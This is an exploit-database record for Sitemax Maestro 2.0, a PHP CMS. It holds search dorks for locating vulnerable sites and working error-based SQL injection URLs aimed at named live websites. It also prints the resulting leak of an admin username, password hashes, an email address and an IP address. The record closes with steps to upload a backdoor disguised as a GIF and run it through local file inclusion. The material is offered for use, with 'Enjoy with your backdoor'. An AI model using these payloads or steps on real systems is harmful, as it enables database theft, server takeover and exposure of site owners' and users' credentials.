Sitemax Maestro 2.0 SQL Injection / Local File Inclusion Vulnerability

{"type": "zdt", "lastseen": "2016-04-20T00:06:48", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Sitemax Maestro 2.0 SQL Injection / Local File Inclusion Vulnerability", "published": "2012-09-04T00:00:00", "href": "http://0day.today/exploit/description/19323", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for php platform in category web applications", "hash": "f2dea653b530303818e62b12734b4141c53c7713c782f9c697c52fb7d150a7d6", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "========================================\r\nVulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/)\r\nSitemax Maestro v. 2.0\r\nVendor: http://sitemax.am/\r\nLicense Type: Commercial\r\nDiscovered and Exploited in Wild\r\n=========================================\r\nDork 1:\r\nsite:am pages.php?al=\r\n\r\nDork 2:\r\nsite:am swlang.php\r\n\r\nDork: 3\r\n\r\nDesigned and developed by SiteMax IT\r\nSitemax Maestro v. 2.0\r\n\r\n=========================================\r\n\r\n\r\nError based Blind SQLi:\r\n\r\n\r\nhttp://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n\r\nhttp://megasport.am/maestro/ <== Admin Panel\r\n\r\n\r\nMegasport\r\n2012-09-03 05:51\r\nFatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1\r\nSELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1\r\n\r\n\r\n\r\n\r\nIf the MYSQL v >5.1 you can use this way also:(Funny pow() failure ;))\r\n\r\nhttp://site.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1\r\n\r\n\r\nDemo 2 and New technique:\r\n\r\n\r\nhttp://armenbrok.am/pages.php?al=contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1\r\n\r\n\r\n2012-09-02 19:59\r\nFatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','getosdur@localhost.tld','130.193.121.51') from dual limit 1))),(rand() * 1e100))'\r\nSELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND visible='1' LIMIT 1\r\n\r\n\r\n\r\nLocal File Inclusion:\r\n\r\nAfter gain access to admin panel: Upload your backdoor as backdoor.gif file using site.am/pfs.php\r\n\r\nThen include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA==\r\n\r\n\r\n\r\nEnjoy with your backdoor on server)\r\n\r\n\r\n/AkaStep & BOT_25 & HERO_AZE\r\n\r\n\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-19323", "sourceHref": "http://0day.today/exploit/19323", "modified": "2012-09-04T00:00:00", "reporter": "AkaStep", "enchantments": {"vulnersScore": 6.5}}